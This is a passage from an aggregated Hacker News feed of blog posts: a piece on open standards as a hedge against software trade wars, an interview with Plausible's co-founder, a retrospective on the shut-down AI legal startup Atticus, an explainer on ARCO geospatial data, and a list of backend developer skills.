    Moving beyond the trends contributing of economic nationalism and protectionism, there's an arsenal of trade restriction mechanisms that each economy leverages to achieve their economic and political goals. Here's some examples of how protectionist trends can result in real policies that impact the products we buy, even software.

    • Tariffs: Taxes or duties imposed on imported or exported goods, making them more expensive than domestic products. Tariffs are a classic protectionist measure used to shield domestic industries or as retaliation in trade disputes. This is clearly the most popular form of trade restriction as it has dominated the news cycle over the last month or so with tariffs being both threatened and implemented against various countries globally—and software licenses are an easy target.
    • Quotas: Limits on the quantity of specific goods that can be imported or exported. Import quotas restrict the supply of foreign goods, protecting domestic producers. Export quotas restrict what a foreign economy can buy, protecting strategically important products. The most famous of these quotas is the export quota placed on Nvidia GPUs to China—a stark example of how tech can become a geopolitical football overnight.
    • Embargoes and Sanctions: Government-imposed bans on trade with specific countries or in specific goods, often used for political or security reasons. The biggest of these sanctions has been on Russia since the start of the Ukraine war, where the US and the EU attempted to ban all import and export to and from Russia. Your cloud provider or AI model could vanish from your tech stack overnight if that type of sanction was implemented more liberally.

    While the movements of globalization and free trade throughout the 20th century helped to usher in a time of unprecedented peace and global prosperity, we have nevertheless clearly shifted back towards nationalism and economic protectionism.

    With global IT spending now over $5 trillion globally, it is a massive target for taxation and restriction. This means that while software sales has been traditionally overlooked when trade restrictions are implemented, we should expect that in a world with greater protectionism that software sales will inevitably be taxed, restricted, or weaponized in some way.

    How Global IT Spend Is Divided

    So this begs the critical question: how should we prepare, as developers, users and buyers of software, for the potential of a software-based trade war that could pull the rug out from under your tech stack overnight?

    The answer is Open Standards—your only reliable escape hatch.

    Open-Standards and their Benefits

    So what are Open Standards?

    At their core, an Open Standard is just an agreement on technical details such as a schema, API, or SDK that the broader community can contribute to with the goal of standardization. We are very used to working with Open Standards in our daily lives as consumers, from the USB hardware standard that has sought to simplify the cables and connectors we use in our hardware to the HTML web development standard that has made it possible for the proliferation of software applications online.

    The typical benefits of an Open Standard are:

    • Reduced vendor lock-in
    • Increased flexibility
    • Greater interoperability between technologies

    When it comes to consumer technology, interoperability is the primary benefit, but when it comes to software that we use and purchase to help us run our companies, increased flexibility and reduced vendor lock-in become critical—potentially existential—advantages.

    And it is exactly this type of flexibility that we're looking for to reduce the risks associated with tariffs and trade restrictions that could otherwise leave your business high and dry.

    Why Open Standards Matter Now More Then Ever

    Typically what we hear in the news is that trade wars impact hard goods and commodities. The impacted products that we conjure in our minds are commodities like steel, oil, lumber and natural gas or physical products like cars or GPUs. But software is fair game too.

    This isn’t hypothetical; there’s recent precedent for a software-based trade war. In the past year global sanctions on Russia were expanded to include software as a result of the war in Ukraine. This was relatively novel at the time and felt like an extraordinary measure. But desensitization happens fast and software restrictions no longer feel extraordinary—they could become the new normal, and your tech stack could be next.

    In coming trade wars it's entirely possible that software is hit with the double impact of government policy and a popular boycott. Where both consumers and businesses actively choose to cut spend if they believe it's going to a country they are in a conflict with—or face public backlash if they don't.

    In a situation where you may be taxed, boycotted, or completely cut off from buying software from a given country, there is a significant amount of value in increasing flexibility and giving yourself the ability to hot swap software providers before your costs increase or you're locked out and left hanging.

    This is where software that adheres to Open Standards fits in. The benefits of Open Standards are clear; reduced lock-in, increased flexibility and greater interoperability. Software providers that adopt Open Standards are signaling to their buyers that they don't want to force lock-in, they want to keep your business through quality and experience. The flip side to this is that if you've bought software that adheres to Open Standards, you can move providers easily if you have to. This means that if taxes, tariffs, or restrictions become too heavy handed for a given software provider, you can find a competitor not subject to those policies or restrictions and hot swap easily—before your business takes a critical hit.

    Now the question is which Open Standards are the most relevant and helpful for your emergency exit strategy?

    Which Open-Standards Should You be Aware Of

    As I mentioned above there are Open Standards for everything from hardware to the software that underpins the internet. Most of these Open Standards are not relevant, so it's important to stay aware of the Open Standards that can specifically help you to avoid lock-in for your software spend as a business when the political winds shift.

    OpenTelemetry
    An open standard for Observability that defines a core set of APIs and SDKs that generate, collect and export telemetry data that helps to analyze software performance and behaviour. OpenTelemetry has been around for quite a while, is mature, and has a deep level of support in the Observability community—making it a solid lifeboat if your current monitoring solution becomes a casualty of trade wars.

    OpenFeature
    OpenFeature is an open standard for Feature Flagging that defines a core set of APIs that you can design your software or application around that can then be controlled by any of a number of 3rd party Feature Flag providers. Open Feature even has a Multi-Provider designed specifically to make it easy to swap between Feature Flagging tools when your current provider suddenly becomes politically toxic.

    CloudEvents
    CloudEvents is an Open Standard specification for describing event data in a common way. It’s stated goal is to “dramatically simplify event declaration and delivery across service, platforms and beyond!” Cloud Events has strong industry backing and solid coverage across programming languages, meaning it has you covered for your specific stack.

    OpenMetrics
    An Open Standard that spun out of the Open Source project Prometheus, with the goal of defining the de-facto standard for transmitting cloud-native metrics. OpenMetrics appears to be a smaller project, so we’ll be monitoring it to see if it gains traction.

    There are many other Open Standards out there and the Linux Foundation and Cloud Native Computing Foundation try their best to support as many of them as possible. You can check out the wide variety of projects they support here.

    Conclusion

    We're in a time of growing nationalism, protectionism and global political conflict that's accelerating faster than most predicted. This conflict has traditionally been fought with tariffs, restrictions and taxes on physical goods, but in the future as global software spend continues to grow, we should expect that these trade restrictions will inevitably start to be implemented on software with little warning.

    When—not if—the time comes that your software purchases are either restricted or the cost is arbitrarily increased due to political forces beyond your control, you can protect yourself and your software budgets by being prepared now. Choosing software that supports Open Standards is the best way to stay protected, because you can be confident that if you ever need to switch providers overnight, you won't be locked in when it matters most.

    The writing is on the wall: build your escape hatches now, before the trade wars reach your tech stack.

    ]]>
    https://blog.devcycle.com/open-standards-in-a-trade-war/ hacker-news-small-sites-43195194 Thu, 27 Feb 2025 15:25:48 GMT
    <![CDATA[Interview with Marko Saric, Co-Founder of Plausible (Open Source Analytics)]]> thread link) | @Liriel
    February 27, 2025 | https://docs.opensaas.sh/blog/2025-02-27-meet-marko-saric-co-founder-of-privacy-friendly-plausible-analytics/ | archive.org

    In this interview, Marko Saric shared his thoughts on privacy and running a bootstrapped SaaS business. Plausible integration is already available in Open SaaS as a privacy-friendly alternative to Google Analytics. We hope this interview helps you understand the value of such a product, and the nature of running an open source business.

    Here’s a few other things we’ve covered in this interview:

    • Tackling big tech privacy issues.
    • How bootstrapping your business fuels independence and transparency.
    • Real, practical advice for growing your SaaS the smart way.

    Let’s dive in!

    I’m Marko Saric, co-founder of Plausible Analytics.

    My journey with Plausible began with a growing awareness of the privacy issues surrounding Google and its products. For many years, I was a user of Google’s services but over time (and thanks to Snowden, Cambridge Analytica and other privacy scandals), I became more aware of the negative aspects of surveillance capitalism. This led me to explore better, more ethical alternatives to the big tech products.

    I started sharing these alternatives on my blog which is how I connected with my co-founder Uku. We both had experience in tech and a shared vision of working on a privacy-friendly analytics tool so we decided to work together on Plausible. I’m focused on marketing and communication side of things while Uku is focused on design and development.

    For those unfamiliar with Plausible, how would you describe its core mission in just a few sentences?

    Plausible Analytics is an easy to use, lightweight, open source and privacy-friendly analytics tool. Our mission is to provide website owners with useful insights while respecting visitor privacy.

    We have been working on Plausible for more than 6 years now, have more than 14,000 active subscribers at this point and have counted more than 136 billion pageviews so far.

    Data is everywhere!

    Plausible is bootstrapped and open-source—what made you choose this path instead of taking the more common VC route?

    We chose to bootstrap and open source Plausible because we wanted to maintain control and independence while also being more privacy-friendly and transparent.

    Both of us have worked at venture funded startups in the past and neither of us had good experiences with investors so going bootstrapped was pretty much the way to do this if we wanted to do things our way.

    We’re in the privacy niche so open sourcing our product allows us to build trust as people can inspect our code to verify that our actions match our words. People cannot do that with Google Analytics and other competing products.

    Just like Plausible, Wasp is an open-source project too! We’d appreciate it if you could star Wasp on GitHub as a sign of support! ⭐️

    Do you have any advice for people who are considering bootstrapping their company? Do you have any books or podcasts to recommend?

    I think it’s a good idea to start bootstrapped even if you do wish to get funded. You should focus on creating a great product that solves a real problem and on spreading the word about it. If you do that well, you’ll have investors reaching out to you even if you don’t want or need them.

    I recommend reading “Rework” by Jason Fried and David Heinemeier Hansson. It offers unconventional but valuable insights into running a startup.

    Another good book is “This Is Marketing” by Seth Godin. It’s about how many startups confuse marketing with spending money on advertising, spamming, interrupting, being annoying and other hacks and tricks. That’s not marketing. Marketing is communication.

    How did you get your first customers?

    Our first customers came through community engagement and the “build in public” movement. We shared our journey, steps taken and product development openly on our blog, social media and niche communities such as Indie Hackers. That’s how we got the early beta users and some of those became our first subscribers too.

    What were the biggest challenges you faced while building and growing Plausible?

    The first year was pretty challenging in terms of growth. Uku was working alone on Plausible trying to do both development and marketing. This is pretty much an impossible task. The growth was very slow and we made it to about 100 subscribers and $400 MRR some 14 months into the existence of Plausible.

    That’s when Uku decided to look for a marketing co-founder and that’s how we found me. Being two co-founders helped us put more time and effort into marketing and communication. One of the first things we did when I joined was to change our positioning to make it crystal clear and easy to understand what we do, what we stand for and how we compare to Google Analytics (the biggest name in our market). And then we started publishing educational and informative content covering topics such as privacy, open source, bootstrapping and startup marketing .

    I have written more about the changes we made in these early days in this post.

    Which growth strategies have been the most effective?

    We have a boring marketing strategy and we say no to all the growth hacks and other best marketing practices. Content marketing has been our most effective growth strategy. As an example, the first blog post that I published (Why You Should Remove Google Analytics from Your Site) went viral on Hacker News. It drove some good traffic to our site leading to an increase in brand awareness.

    What matters is doing quality work and staying consistent with it over a longer period of time so we continued to publish multiple blog posts per week for over a year. Thanks to that work, we’ve been fortunate enough to achieve the viral moments on Hacker News multiple times over those first 2-3 years.

    I have shared more about our early years, marketing steps we’ve taken, lessons we’ve learned and things we have achieved in blog posts such as this one. Our analytics dashboard is open to the public so it’s possible to see the progress we’ve made since day one in our stats.

    The community has helped shape our product and spread the word about our mission.

    We have an open roadmap and listen to the product feedback which determines our development prioritization. This is where feature requests and other feedback is very valuable to us. We pretty much pick the most upvoted feature and work on that.

    As mentioned earlier, we don’t do any traditional marketing as in we don’t do any paid advertising nor pay anyone to recommend Plausible. This means that most of our growth comes from people who love using Plausible and who share their experiences with the world. Without people spreading the word about Plausible it would be difficult for us to do what we do. So that’s why community contributions is vital for us.

    Plausible Community

    What’s next for Plausible? Are there any upcoming features or improvements you’re particularly excited about?

    We’re focused on continuing to improve Plausible and making it even more useful and competitive while staying true to our mission and meeting rigorous standards for stability, security and privacy.

    Our developers are currently working on the top two most upvoted feature requests from our public feedback board (scroll depth and saved segments) so that’s very exciting. It would be great to release these two big features soon!


    Just like Plausible, Wasp is an open-source project too! We’d appreciate it if you could star Wasp on GitHub as a sign of support! ⭐️

    ]]>
    https://docs.opensaas.sh/blog/2025-02-27-meet-marko-saric-co-founder-of-privacy-friendly-plausible-analytics/ hacker-news-small-sites-43194954 Thu, 27 Feb 2025 15:00:51 GMT
    <![CDATA[What I Learned from Building and Shutting Down an AI Legal Startup]]> thread link) | @dalberto
    February 27, 2025 | https://blendingbits.io/p/beyond-the-fine-print | archive.org

    replicate-prediction-50b1rdyx6srme0cn8fmrhn5we4.jpg

    I recently shutdown Atticus, my first consumer AI product that aimed to make legal contracts accessible to everyone. The journey of building and launching it taught me invaluable lessons about AI product development, market dynamics, and the future of technology.

    Atticus was born in June 2023 during the initial AI boom when my friend Dylan approached me with a simple question: could AI help analyze his girlfriend's gym contract? Over the next year, we built one of the early consumer-facing AI legal tools. The journey took us through the Vercel AI Accelerator, gave us early access to GPT-4's expanded capabilities, landed us coverage in tech newsletters, and brought paying customers from around the globe.

    At its core, Atticus analyzed contracts by breaking them down into plain English, determining if clauses favored the selected party, and assigning risk scores to concerning terms. Users could also engage with their contracts through an open-ended chat interface.

    After a year and a half of learning, iterating, and serving users across multiple continents, I made the decision to shut it down - not because it wasn't useful (we were still making sales!), but because the path forward revealed deeper insights about the future of AI that I'll share in this post.

    Dylan and I had been consulting on an AI project when he approached me about building a tool to analyze consumer contracts. Initially, we envisioned it as a simple consumer product like WordCounter.

    I was excited because early findings suggested LLMs were particularly well-suited for legal problems. I wrote:

    image.png

    I flagged that costs might make a freemium model prohibitive, but decided to build it anyway, confident that LLM prices would drop over time. I set a one-week deadline to build and start validating the idea with our networks to mitigate the risk of dropping other opportunities.

    unveiling.gif
    The very first demo of Atticus, one week after initially discussing the idea.

    We launched within a week and immediately recognized that running Atticus wouldn't be cheap. In June 2023, the LLM price reductions we now take for granted hadn't kicked in. We applied to the Vercel AI Accelerator for free AI credits and access to models that weren't widely available, including Claude (with its then class-leading 100K context window) and GPT-4-32K.

    I built Atticus' backend with Langchain, using a multi-step pipeline to analyze contracts:

    1. Extract text from uploaded documents (PDFs, docx, etc.)

    2. Determine contract type and extract key information like dates and parties

    3. Generate analysis criteria - the clauses an experienced attorney would look for in that contract type

    4. Compare the contract against these criteria, analyzing how favorable each clause was

    This approach had several advantages:

    • Reduced perceived latency by splitting the analysis into stages

    • Improved effectiveness by focusing the model on specific tasks

    • Enabled caching by separating contract type analysis from specific instances

    • Provided a dynamic, non-deterministic approach that still yielded consistent results

    mermaid-diagram-2025-01-30-175515.png

    Initially, I spent significant time optimizing our pipeline to reduce costs, trying different RAG techniques and models. Between the Vercel AI credits and my belief that costs would eventually decrease, I pivoted to focus on launching faster.

    B1006F28-B9ED-4C3C-82C1-6DC774EB7604_1_105_c.jpeg
    The first public IRL demo at Betaworks!

    After launch, we found that people in our networks liked the concept but didn't need a tool like Atticus consistently. We explored different ICPs over the next few months - content creators, tech consultants, construction contractors, and startup founders. I even cold emailed ~60 construction companies in NYC (0% response rate 😭).

    While our rapid experimentation approach was valuable, in retrospect, we should have gone deeper with each potential ICP rather than quickly switching between them. For instance, with construction companies, phone calls might have been more effective than email outreach.

    We got most of our users through:

    • LinkedIn, where our "build in public" approach resonated with professional networks

    • In-person demos at meetups (though mostly to AI enthusiasts rather than target users)

    • Hacker News posts (briefly reaching page 1 of Show HN)

    • Tech newsletters like Ben's Bites and There's An AI for That, which drove significant organic traffic

    3E243E54-C26E-4909-855F-01C6ED811316_1_105_c.jpeg
    Presenting at Bloomberg Beta in October ‘23

    In the fall, Lunar and Dylan redesigned Atticus into something that looked like a real product:

    atticus-redesign.gif

    Around this time, Dylan noticed we had users returning frequently, so we implemented usage-based billing - 4 analyses for $20. We set up Stripe within a couple of days and got our first paying customer in October 2023! Sales continued to trickle in consistently until the day right before I decided to shut down.

    We applied to YC and got an interview, though we didn't get funded. Their feedback centered on Atticus not being venture-scale, which I didn't fully disagree with.

    image 2.png
    We did too many takes for our YC app 😭

    In retrospect, the YC rejection was the death knell for Atticus. I processed the rejection emotionally but moved on without fully internalizing or actively rejecting the feedback - a missed opportunity to make a more deliberate strategic decision.

    After scaling down resources to reduce operating costs and switching to more affordable models, Atticus continued to generate sales. It was bittersweet to see my prediction about falling LLM costs play out in real life. 🥲

    A concept like Atticus requires changing people's expectations of what technology can do for them. While technology evolves rapidly, people and institutions change much more slowly. As Tyler Cowen said in a recent interview: "the number one bottleneck to AI progress is humans."

    Atticus excited early AI adopters but faced barriers to broader adoption. One model we explored was offering AI-augmented legal services, using AI to handle monotonous low-value work while connecting lawyers with high-value work.

    However, lawyers showed little enthusiasm for disrupting their own industry. The legal system is built around billable hours, and persuading professionals to change a system that financially benefits them proved extremely difficult. As Upton Sinclair noted: "It is difficult to get a man to understand something, when his salary depends on his not understanding it."

    Potential customers (startup founders and operators) recognized the value, feeling the pain of inefficient legal processes. But we faced a chicken-and-egg problem: delivering the service required lawyers who weren't ready to adopt the technology.

    An idea this disruptive could succeed, but it needs a long-term plan (10+ years) with sustainable phases along the way. Think of Amazon, which aimed to be the "everything store" but started with books before expanding category by category. We lacked such a patient approach.

    Another challenge: AI products aren't well-suited to traditional software business models. Unlike deterministic software, AI models are probabilistic and sometimes make mistakes. This contradicts customer expectations that software will work the same way every time.

    In retrospect, the "services as software" model that has since emerged seems most promising for AI products and agents. But this approach requires domain experts, bringing us back to the challenge of convincing technology-resistant lawyers to participate.

    Despite these challenges, several things went right:

    Speed and iteration. We got an MVP in front of users within a week and built in public, garnering attention and support. A few months in, we implemented monetization and made our first sale within days of launching Stripe integration.

    Usage-based pricing aligned well with our users' needs, as most didn't require ongoing analysis. Personally, making money directly from customers was exhilarating - a milestone "you can just do things" moment after years at early-stage startups.

    Ignoring the "thin wrapper" stigma. In 2023, many believed model providers would capture all the value in AI. Our experience proved otherwise - users didn't care how Atticus worked, only that it solved their problem. Several users familiar with ChatGPT still valued our bespoke solution.

    Cost projections proving correct. LLM prices plummeted as predicted, making Atticus more viable over time. GPT-4-32K initially cost $60 per million input tokens and $120 per million output tokens. Today, GPT-4o costs just $2.50 and $10 respectively - over 90% lower in less than two years.

    Building and shutting down Atticus taught me lessons no book could provide. Perhaps most surprising was realizing how different AI product development is from traditional software development - you're constantly navigating probabilities and edge cases rather than deterministic behaviors.

    This insight has shaped Ascention, my venture that helps teams adopt AI while building AI-based products. My vision is for Ascention to be to the AI age what 37signals was for the SaaS era – creating products and methodologies that define best practices in this new paradigm.

    I've realized that the magic happens at the intersection of deterministic systems and AI capabilities. These systems require fundamentally different approaches to design, development, and user expectations.

    The marketing journey revealed unexpected global interest - about 60% of our traffic came from outside the US. Legal documentation is clearly a universal pain point, though this complicated our approach given the jurisdictional complexities of legal assistance.

    I confirmed my passion for 0-to-1 building and high-ambiguity environments. Starting with a blank slate and rapidly testing hypotheses energizes me in ways that later-stage product development doesn't. For truly transformative ideas like Atticus, however, you need a 10-year vision with sustainable phases along the way.

    Technically, I discovered that frameworks like Langchain eventually became obstacles as I developed deeper familiarity with LLMs. The technology evolved at breakneck speed - features we built with considerable effort later became standard in LLM APIs, and expanding context windows made our document chunking strategies increasingly unnecessary.

    The most practical lesson? Experiment quickly, but establish clear criteria for continuation or exit. Monetize early, even imperfectly - revenue validates your concept and provides emotional fuel through inevitable challenges.

    Perhaps the most profound discovery was about agency - the power of "just doing things." There's something liberating about taking an idea from concept to reality and having strangers value it enough to pay for it. It reminds me of Theodore Roosevelt's "Man in the Arena" speech: "The credit belongs to the man who is actually in the arena, whose face is marred by dust and sweat and blood..." Despite its outcome, I wouldn't trade the Atticus experience and the growth it fostered.

    While Atticus didn't become the venture-scale business we envisioned, I remain bullish on AI's transformative potential in legal services and beyond. We were right about where the puck was going but underestimated what it would take to survive until it got there. These lessons have fundamentally shaped how I'll approach building products through Ascention - creating systems that harness AI's potential while acknowledging its unique characteristics.

    This journey wouldn't have been possible without my incredible collaborators:

    Dylan was the catalyst that set everything in motion. From our initial conversations to driving key decisions around rapid launches and monetization, his technical prowess and entrepreneurial instincts were invaluable. Dylan's ability to transform abstract ideas into working code gave Atticus its initial momentum. He's now channeling his considerable talents into his own venture, and I have no doubt it will be exceptional.

    Greg brought strategic organization and clarity amidst the chaos of early-stage building. His remarkable talent for driving alignment and "sharpening thinking" helped us navigate crucial decision points. Greg has that rare ability to synthesize complex information, identify core issues, and orchestrate teams toward coherent action.

    Lunar, my friend of over a decade, transformed Atticus from a functional tool into an experience users genuinely loved. Her extraordinary design sensibility elevated everything we built. In a world where skeptics dismiss AI products as "thin wrappers," Lunar's design expertise created an interface so thoughtful that users consistently praised the experience.

    The Atticus journey reinforced something I've always believed: extraordinary collaborators make all the difference. I'm profoundly grateful to have worked alongside such talented individuals, and I look forward to watching their continued impact on the technology landscape.

    ]]>
    https://blendingbits.io/p/beyond-the-fine-print hacker-news-small-sites-43194882 Thu, 27 Feb 2025 14:54:56 GMT
    <![CDATA[ARCO: The Smartest Way to Access Big Geospatial Data]]> thread link) | @todsacerdoti
    February 27, 2025 | https://blog.lobelia.earth/arco-the-smartest-way-to-access-big-geospatial-data-eaf689eff3c9 | archive.org

    Lobelia Earth

    Lobelia Earth

    Geospatial data supply and demand have increased exponentially over the past decade. Until recently, data processing has been limited in its ability to make this wealth of information easily accessible to users globally, with a significant gap between the growing demands for geospatial data and the actual supply that systems could provide. Processing data using the ARCO format enables data and visualisation services that reliably meet users’ needs to quickly and conveniently access big geospatial data.

    ARCO stands for Analysis-Ready Cloud-Optimized, a framework to structure and store geospatial data more efficiently. ARCO data is designed to make large geospatial datasets more accessible by 1) making them uniform and by 2) organising them into smaller subsets. This allows for any part of a dataset to instantly be made viewable and available to users for quick download. ARCO data processing is especially useful for remote sensing, environmental and climate science, and AI applications.

    Read on to understand more about how ARCO works and the benefits it offers to users.

    The acronym ARCO describes a two-part system designed to take big data files and make them accessible to users.

    Analysis-Ready: Multiple experts across scientific domains work on the generation of Earth Observation and Earth Modelling datasets and make numerous format decisions using standards within their domain. Taking these datasets across and beyond their scientific domains requires interoperability, which is at the core of the production and dissemination of ARCO data.

    Data conventions help to standardise variable names, dimensions, ranges, timestamps and other characteristics, which enables the interoperability of datasets across diverse fields of science, data sources, and data producers. Homogenising data is the first key part of ARCO data, allowing it to be analysed and viewed seamlessly together.

    For example, the vertical dimension is generally named altitude in atmospheric science and depth in oceanography. In ARCO, these variables both become elevation, which is positive when measuring altitude above sea level and negative when measuring depth below sea level.

    Cloud-Optimised: This refers to data that is optimised to be efficiently stored, accessed, and processed in a cloud computing environment such as environments provided by cloud service providers like Amazon Web Services, Google Cloud, CloudFerro, OVH, or other European Cloud Providers– bypassing the need of a server.

    In the traditional client-server model, when a user wants to see a map in an online tool, the client-side requests a map image or a pre-rendered map tile. Then the server sends the requested data back to the user. While this model works to render static images, it becomes extremely slow as the dataset size scales up. When requesting complex datasets such as in-situ observational data, the process can take hours to download because of limited centralized server capacity.

    The download of ARCO data is faster for several reasons. First, the ARCO format enables retrieval of only the pieces of data that a user needs. Secondly, ARCO allows for the use of distributed storage in the cloud. Distributed storage (i.e. storing data in a cloud network) enables fast processing of parallel geospatial data requests (by a single user or by multiple users). Moreover, whereas in a server-based system there are size limitations in data download per request, with serverless ARCO service there are no quotas imposed. The download limits are defined by the user’s machine capacity, not by the system serving it. For users, this means that complex analytical tasks requiring multiple downloaded datasets can be accomplished more quickly.

    In order to process an original dataset into ARCO, the data undergoes a full post-processing where data is internally organised into multiple smaller ARCO datacubes defined by the four main dimensions of geospatial data, i.e. time, latitude, longitude and elevation. This step is called data chunking.

    The data chunking allows the user application to access any dimension the user needs. Using time as an example, if a user needs a time series of a location then the system gathers only the information for a specified area to retrieve the data needed for that time series. If the user needs a map of a particular point in time, the system gathers all the data for a given area for only that specific timestamp. With the data chunked in different dimensions, the download becomes as optimal as possible in terms of size.

    The use of ARCO data enables a massive jump in performance. A great example of this is the task of downloading reanalysis data, such as GLORYS or ERA5, for a time series. Whereas in the past, a user would have to spend hours downloading decades of data, now a user can download only what is needed, using much less storage. For the user this means not only speed and accessibility, but also the ability to work on data using less powerful laptops. ARCO datacubes are highly optimised for accessibility, and are able to satisfy the needs of very demanding use cases like web-based interactive exploration.

    To enable data chunking, the geospatial ARCO data is stored in the Zarr format. Zarr is a file format and storage specification that is n-dimensional, which means that the data can be accessed by as many dimensions as are available in the dataset. A subset of the chunked Zarr data is transformed to the familiar NetCDF format for the final user when they make a data download request.

    ARCO data processing homogenises and breaks large files into smaller chunks enabling smarter data access.

    ARCO applications are rapidly becoming popular in the geospatial field. Well-known operational applications based on this framework include those provided by the Copernicus Marine Service. In 2022, the Copernicus Marine Service developed a prototype using ARCO to evaluate its operational feasibility and overall performance. This prototype later became the foundation for the new Copernicus Marine Data Store (MDS).

    Today, MDS utilizes a scalable, cloud-based ARCO data catalogue to ensure fast and transparent retrieval of large datasets for all users of the Copernicus Marine Service. The performance capabilities of the ARCO backend used by the Copernicus Marine Service are exemplified by MyOcean Pro, a web viewer that allows users to visualize, explore, and download marine data in just a few seconds, supporting between 2,000 and 4,000 users daily.

    MyOceanPro Marine Data Viewer from Copernicus Marine Services

    The technical advancements explained above can be summarized in four key practical benefits for users.

    Removal of queues, quotas and download job limits — No limitations on data download — Maximum number of simultaneous downloads at service level do not exist.

    High data-access performance — Data access capability scales up with the requests, maintaining high access performance and reliability.

    Collaboration & reproducibility — With the increase of data accessibility, collaboration among scientists and data users is improved, allowing faster research development and knowledge sharing.

    Lower cost — Removing the need for large downloads reduces resource costs. This allows users to have equal access to data and scientific insights.

    These technological advantages highlight the potential of ARCO formats to become the new standard for managing and accessing big geospatial data on Earth Observation and Earth modelling.

    About Lobelia

    Lobelia Earth is an SME based in Barcelona specialising in satellite technology, computational intelligence, and data visualisation. The company develops applications and infrastructure-based services to support geospatial data accessibility and visualisation.

    Lobelia is responsible for developing and maintaining the data applications and viewers for the Copernicus Marine Data Store, the MyOcean PRO Viewer, the WEkEO platform, and it is currently in charge of the contract with ECMWF to create the Serverless Data Access & Visualisation for the Copernicus Climate Change Service (C3S) and the Copernicus Atmosphere Monitoring Service (CAMS) data.

    ]]>
    https://blog.lobelia.earth/arco-the-smartest-way-to-access-big-geospatial-data-eaf689eff3c9 hacker-news-small-sites-43194779 Thu, 27 Feb 2025 14:42:06 GMT
    <![CDATA[Back end developer: Current industry expectations and growth opportunities]]> thread link) | @artem001
    February 27, 2025 | https://softwareengineering.live/backend-developer | archive.org

    This resource helps you keep tabs on the backend development landscape. You'll stay updated on the current industry expectations of the backend development roles in different tech stacks, including being notified of growth opportunities.

    This page will be actively updated as I browse through different backend developer job listings in addition to keeping tabs on the changing technology landscape.

    Skills required of a backend developer

    • Design and develop scalable, reliable and maintainable backend services, including APIs and microservices, in alignment with the business requirements

    • Ability to create or contribute to low-level and high-level design documents

    • Ability to write reliable, maintainable and clean code with optimum test coverage

    • Knowledge of data structures and algorithms

    • Knowledge of object-oriented programming and design patterns

    • Strong hands-on experience with a specific backend programming language, associated frameworks and the stack

    • Experience with version control tools like Git

    • Knowledge of cloud computing

    • Experience with designing and deploying services for the cloud leveraging cloud-native technologies like Docker and Kubernetes

    • Experience with continuous integration (CI) and continuous deployment/delivery (CD)

    • Experience with databases such as MySQL, PostgreSQL, or MongoDB

    • Experience with implementing observability for your service

    • Experience with code quality analysis and build tools

    • Understanding of Linux/Unix systems

    • Familiarity with agile software development methodology

    • Can act as an individual contributor, taking full ownership of their code from design to deployment.

    • Not all, but a few job openings focus on TDD (Test-driven development) and BDD (Behavior-driven development)

    The skills above are common to all backend programming languages, be it Java, Python, Go, NodeJS, and more. Now, let's delve further into the industry expectations of backend developers in specific programming languages.

    Java developer

    • Spring framework, Spring Boot (Spring framework reigns the Java development realm)

    • Hibernate (ORM)

    • Implementing robust exception-handling patterns and error-management strategies

    • Maven/Gradle as build automation tools.

    • Strong understanding of JDK (A good percentage of job openings stress this. A discussion on this coming soon)

    • Jenkins for CI/CD automation

    • JUnit, TestNG, Mockito

    • The Java 8 version is what most companies have standardized in their job descriptions. Newer versions are a good to have.

    Python developer

    • Though there are quite a number of popular Python frameworks, the most appearing in the job descriptions are Django, Flask, and FastAPI

    • SQLAlchemy, Django ORM as ORMs

    • Celery for asynchronous processing and task scheduling

    • pytest for testing

    Python is heavily used in AI/ML and data engineering use cases, but I am not listing them here since this post focuses on backend web services development. All those use cases will be discussed in another post covering data engineering and data science.

    NodeJS developer

    • TypeScript knowledge is a requirement in most job openings.

    • The frameworks that appear most are ExpressJS, NestJS, Fastify, Koa, and Hapi.

    • Knowledge of ORMs: Prisma, Mongoose.

    • Knowledge of WebRTC, Socket.io (This requirement appears most in the job listings of companies working on video conferencing apps, gaming, multiplayer collaboration tools, streaming services and secure communication platforms)

    • Good working knowledge of Node.js architecture (A detailed discussion on this coming soon)

    • Understanding the nature of asynchronous programming and its quirks and workarounds

    • Solid JSON experience (A small percentage of jobs have this requirement. This primarily entails creating, testing, and deploying automated workflows and tools using JSON. A discussion on this coming soon)

    • Working knowledge of node.js package management and the tools ecosystem

    • Good understanding of server-side templating languages and server-side CSS pre-processors

    • UnitJS, Mocha, Chai, and Jest for testing

    Furthermore, the NodeJS job openings have significant overlap in requirements with the MERN (MongoDB, ExpressJS, ReactJS, NodeJS) stack job listings.

    This entails knowledge of frontend technologies (React, Angular, Vue, Svelte, Tailwind, Bootstrap, and more) along with NodeJS and having a strong understanding of web development and site performance fundamentals. We will have a detailed discussion on this in the frontend developer industry expectations post.

    Golang developer

    • Frameworks Gin, Echo, Fiber, Chi. Gin has the highest number of occurrences in job listings.

    • GORM (ORM)

    • Knowledge of Gorilla Mux, Go-Chi, Go-Kit

    • Strong understanding of Golang architecture, including Golang modules and packages.

    • Strong knowledge of Go routines, channels, and concurrency patterns.

    • Proficient in the implementation of complex algorithms and concurrent executions using Go-routines, Channels and Mutexes.

    • Experience with Golang databases, including relational databases and NoSQL databases. (There are databases written in Go, such as CockroachDB, InfluxDB, etc., that are optimized for performance and distributed systems. However, experience with Golang databases is not a necessity but a good to have)

    • Testify, Ginkgo, GoMock for testing.

    Industry expectations for C#, C++, Rust, ROR, Kotlin and other languages will be added soon.

    Backend development specialized competencies

    Besides the knowledge of the core tech stack there are job openings that look for backend developers with a specialized skill set.

    Specializing in a specific skill or a certain area of backend development increases our value, as most developers have only a general understanding of the core tech stack without developing proficiency in specific areas.

    The skills listed below are in high demand but in low supply, which naturally drives up the pay scale, in addition to cutting down the competition. Furthermore, detailed discussions on each one of them are coming soon:

    • Proficiency in multithreaded, concurrent and low-latency programming

    • Experience building event-driven and messaging systems with Kafka and related technologies

    • Ability to write scalable, immutable, and composable code with functional programming knowledge. (Functional programming knowledge is key in implementing data-intensive distributed systems)

    • Experience building high-performance data-intensive applications with distributed computing frameworks like Apache Spark, Hadoop and Kafka.

    • Strong understanding of distributed systems. Ability to optimize them for performance.

    • Experience with ElasticSearch and ELK stack for implementing search and observability

    • Systems programming, including knowledge of networking fundamentals. (You'll find this requirement in the backend engineer job listings of infrastructure-focused companies)

    • Experience with EIP (Enterprise Integration Patterns) and enterprise architecture. (These requirements are primarily for large-scale enterprise systems in domains such as finance and banking, telecom, healthcare and insurance, retail, and so on. Java reigns this space.)

    • There are dedicated job listings for GraphQL backend developers by companies that heavily use GraphQL for API development, microservices, and data fetching optimization. They need expertise in Apollo, Hasura, Prisma, Federation, Subscriptions (WebSockets), caching, and schema stitching.

